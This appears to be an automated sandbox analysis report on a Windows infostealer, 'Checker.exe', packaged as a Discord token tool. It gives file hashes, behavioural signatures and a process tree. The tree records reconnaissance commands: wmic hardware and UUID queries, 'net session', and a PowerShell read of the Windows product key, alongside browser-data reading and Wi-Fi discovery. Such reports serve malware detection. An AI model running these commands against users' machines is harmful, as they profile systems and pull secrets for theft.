Analysis
max time kernel: 66s
max time network: 161s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/11/2024, 23:49
Static task
static1

Behavioral tasks (task: sample / resource)
behavioral1: Token Join Discord.exe / win7-20241023-en
behavioral2: Token Join Discord.exe / win10v2004-20241007-en
behavioral3: $PLUGINSDIR/StdUtils.dll / win7-20240903-en
behavioral4: $PLUGINSDIR/StdUtils.dll / win10v2004-20241007-en
behavioral5: $PLUGINSDIR/System.dll / win7-20241023-en
behavioral6: $PLUGINSDIR/System.dll / win10v2004-20241007-en
behavioral7: Checker.exe / win7-20240903-en
behavioral8: Checker.exe / win10v2004-20241007-en
behavioral9: LICENSES.chromium.html / win7-20241010-en
behavioral10: LICENSES.chromium.html / win10v2004-20241007-en
behavioral11: d3dcompiler_47.dll / win10v2004-20241007-en
behavioral12: ffmpeg.dll / win7-20240903-en
behavioral13: ffmpeg.dll / win10v2004-20241007-en
behavioral14: libEGL.dll / win7-20240903-en
behavioral15: libEGL.dll / win10v2004-20241007-en
behavioral16: libGLESv2.dll / win7-20240903-en
behavioral17: libGLESv2.dll / win10v2004-20241007-en
behavioral18: resources/elevate.exe / win7-20241010-en
behavioral19: resources/elevate.exe / win10v2004-20241007-en
behavioral20: vk_swiftshader.dll / win7-20240903-en
behavioral21: vk_swiftshader.dll / win10v2004-20241007-en
behavioral22: vulkan-1.dll / win7-20240903-en
behavioral23: vulkan-1.dll / win10v2004-20241007-en
behavioral24: $PLUGINSDIR/nsis7z.dll / win7-20241010-en
behavioral25: $PLUGINSDIR/nsis7z.dll / win10v2004-20241007-en
General
Target: Checker.exe
Size: 164.7MB
MD5: 3c52730a2553bdfd48259cfad6c11b85
SHA1: 71f45f724ac58823dcf075d3979b7bb841d78324
SHA256: fa8032f79660bd6cac0fc70a3493e714317e8a1d51233f9af8035eefe9da8760
SHA512: dcd783db9555362f83e46ebaacc77454618331397582f25eb27a42fc4d54fbf52d7373109b47adde43e705dcd5cf9014986c29778378342d560296b53c413608
SSDEEP: 1572864:1xGeD65iMor30uXkaYCELW0ejTV1FQ3mRVvHTxnHqVstmZC/wu32Q/djfP85WhkF:AeJEhTWTjiWhS
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation (Checker.exe)
Clipboard Data (1 TTPs, 64 IoCs)
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Loads dropped DLL (2 IoCs)
- PID 2572 Checker.exe
- PID 2572 Checker.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
- PID 8952 powershell.exe
- PID 11052 powershell.exe
- PID 8860 powershell.exe
- PID 10472 powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
- flow 59: raw.githubusercontent.com
- flow 62: raw.githubusercontent.com
- flow 65: raw.githubusercontent.com
- flow 67: raw.githubusercontent.com
- flow 68: raw.githubusercontent.com
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 35: ipinfo.io
- flow 36: ipinfo.io
Enumerates processes with tasklist (1 TTPs, 64 IoCs)
Hide Artifacts: Hidden Files and Directories (1 TTPs, 2 IoCs)
- PID 7860 cmd.exe
- PID 3064 powershell.exe
Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
System Network Configuration Discovery: Wi-Fi Discovery (1 TTPs, 2 IoCs)
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
- PID 8624 cmd.exe
- PID 8596 netsh.exe
Checks processor information in registry (2 TTPs, 7 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (Checker.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (Checker.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Checker.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (Checker.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (Checker.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (Checker.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 (Checker.exe)
Detects videocard installed (1 TTPs, 1 IoC)
Uses WMIC.exe to determine videocard installed.
- PID 10388 WMIC.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 8032 schtasks.exe
Suspicious behavior: EnumeratesProcesses (22 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of FindShellTrayWindow (1 IoC)
- PID 2572 Checker.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Views/modifies file attributes (1 TTPs, 1 IoC)
- PID 1900 attrib.exe
Processes
Process tree (indentation shows parent/child; each entry: [PID] image | cmdline | signatures)
- [PID 2572] C:\Users\Admin\AppData\Local\Temp\Checker.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\Checker.exe" | signatures: Checks computer location settings; Loads dropped DLL; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
  - [PID 3456] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" | signatures: Suspicious use of WriteProcessMemory
    - [PID 5100] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 5084] C:\Users\Admin\AppData\Local\Temp\Checker.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\Checker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\menstruum" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1800 --field-trial-handle=1812,i,17893640996960591007,2971762690342059213,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  - [PID 5016] C:\Users\Admin\AppData\Local\Temp\Checker.exe | cmdline: "C:\Users\Admin\AppData\Local\Temp\Checker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\menstruum" --mojo-platform-channel-handle=2040 --field-trial-handle=1812,i,17893640996960591007,2971762690342059213,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  - [PID 540] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2572 get ExecutablePath" | signatures: Suspicious use of WriteProcessMemory
    - [PID 848] C:\Windows\System32\Wbem\WMIC.exe | cmdline: wmic process where processid=2572 get ExecutablePath | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 3932] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7460] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 4720] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7348] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - [PID 4428] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7356] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 1004] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7776] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1232] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7768] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4044] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7792] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4900] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7452] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4928] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7604] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2300] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7436] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - [PID 912] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7596] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1652] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7588] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4452] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7524] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 368] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7668] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 3320] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7736] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4600] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7944] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1324] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7380] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3296] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7628] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 428] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7696] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 1496] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7712] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2028] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7516] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3188] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7860] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 2656] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7744] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2752] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7648] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1528] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7536] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 3936] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7412] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Suspicious use of AdjustPrivilegeToken
  - [PID 4880] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7640] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1176] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7728] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4744] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7876] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2180] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7928] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2172] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7372] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4640] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8372] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 5032] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7808] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3692] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7676] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3948] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8012] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3548] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7492] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 2060] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7620] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 1824] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7612] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 964] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8076] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4032] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7500] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 5096] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8268] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3180] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7936] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2948] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7388] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2868] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7752] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1976] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8528] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4316] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8260] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2112] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7892] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4328] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7688] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3532] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8236] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1308] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8380] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2632] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7656] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4028] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7468] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - [PID 4476] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7576] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 1120] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8212] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4576] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7720] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3120] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7396] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4248] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7852] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3684] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7340] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1624] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7404] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2668] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7444] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3908] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7560] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1008] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8020] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2796] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7568] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3492] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8560] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 1580] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7916] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4560] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7904] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4056] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7816] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 452] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8284] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 2024] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 540] C:\Windows\System32\Conhost.exe | cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - [PID 8576] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 2416] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8004] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 228] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8220] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4496] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8228] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 1524] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7996] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4352] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7980] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4784] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8292] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4520] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8244] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4340] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8160] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4628] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8276] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4164] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8584] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4816] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7284] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - [PID 3020] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8656] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 3100] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7844] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3968] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8152] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4588] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7508] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 3408] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8068] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 516] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 7972] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 4620] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8472] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 4048] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8568] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 5128] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8088] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 5156] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8060] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 5180] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8300] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
  - [PID 5188] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8204] C:\Windows\system32\tasklist.exe | cmdline: tasklist
  - [PID 5216] C:\Windows\system32\cmd.exe | cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - [PID 8252] C:\Windows\system32\tasklist.exe | cmdline: tasklist | signatures: Enumerates processes with tasklist
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "net session"2⤵PID:5224
-
C:\Windows\system32\net.exenet session3⤵PID:8516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:9236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"2⤵PID:5252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:5288
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:7964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"2⤵PID:5304
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption, osarchitecture3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7800
-
-
C:\Windows\system32\more.commore +13⤵PID:7988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"2⤵PID:9544
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:10556
-
-
C:\Windows\system32\more.commore +13⤵PID:10564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"2⤵PID:10628
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController get name3⤵
- Detects videocard installed
PID:10388
-
-
C:\Windows\system32\more.commore +13⤵PID:11020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:8308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5292
-
-
-
